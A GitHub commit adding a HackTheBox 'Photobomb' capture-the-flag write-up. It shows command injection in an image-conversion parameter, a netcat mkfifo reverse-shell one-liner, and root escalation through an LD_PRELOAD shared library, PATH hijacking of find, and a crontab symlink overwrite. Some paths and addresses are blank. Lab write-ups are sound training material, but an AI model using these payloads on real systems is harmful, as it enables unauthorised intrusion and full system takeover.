
This commit is contained in:
ARZ 2023-05-26 04:21:28 +03:00 committed by GitHub
parent a00d0fe28d
commit e047e16549
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

HackTheBox/ Normal file
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@ -0,0 +1,180 @@
# HackTheBox - Photobomb
Nmap scan report for
Host is up (0.093s latency).
Not shown: 54171 closed tcp ports (conn-refused), 11362 filtered tcp ports (no-response)
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
## PORT 80 (HTTP)
Visting the web server, it's going to redirect us to `photobomb.htb` so we need to add it in hosts file
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It shows a link which takes us to `/printer` that asks for credentials
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We can find the credentials by checking the source of the site which shows a js file having the credentials
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With this, we can access the printer page
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What this page does it converts the image into either png or jpg into the specified dimensions displayed on the site
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If we remove any of the POST paramter when downloading the file, it's going to show a stack error revealing that it's using `ruby sinatra` server
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## Foothold
We can see from the stackerror that the `filetype` parameter is being checked if it contains either `png` or `jpeg`, so we can try command injection there, I tried appending the `id` command with `;` but it didn't returned any output
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So I tried making a curl request to my python server which was successful
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Using openbsd nc's reverse shell payload by making it url encoded
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 2222 >/tmp/f
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Stabilizing the shell with python3
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## Privilege Escalation (root)
Running `sudo -l` shows that we can run `` as a root user
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## Method 1
This is allowing us to set environment variables, which means we can set `LD_PRELOAD` path which contains the path to the shared library that will be loaded before anything else, so we can abuse this by compiling this program into a shared library which will set bash a SUID and will spawn it with `bash -p` giving us a root shell
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
system("/bin/bash -p");
gcc -fPIC -shared -nostartfiles -o ./ ./test.c
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sudo LD_PRELOAD=/tmp/ /opt/
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## Method 2
Checking the script which we can run
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
This script is switching to `/home/wizard/photobomb`, where with `-s` it checks if `photobomb.log` exists and is empty, with `-L` and `!` it checks if the logfile isn't a symlink to avoid symlinking and then overwrites the content of photobomb.log to photobomb.log and clears out the the contents of the log file, then with `find` it look for all jpg files and makes root the owner of those images
Now here `find` isn't being ran through it's absolute path which means that we can abuse it by making a file which will spawn bash for us by setting environment variables through which we can achieve PATH variable exploit
<img src=""/>
sudo PATH=/tmp:$PATH /opt/
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## Method 3
Going back to the script, the if condition checks for `photobomb.log` but not `photobomb.log.old` so we can symlink the old log file with `/etc/crontab` and include the crontab in the original log file which will basically overwrite the crontab file
So symlinking the file with cronab
ln -sf /etc/crontab photobomb.log.old
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Now place a bash script which will make bash a SUID or you can place a reverse shell there
chmod +s /bin/bash
<img src=""/>
* * * * * root /tmp/
Putting the cronab in `photobomb.log` file which will overwrite the old log file which will then overwrite the cronab file, making bash a SUID and then we can spawn bash with `-p` to execute it as the SUID owner which is root
<img src=""/>
## References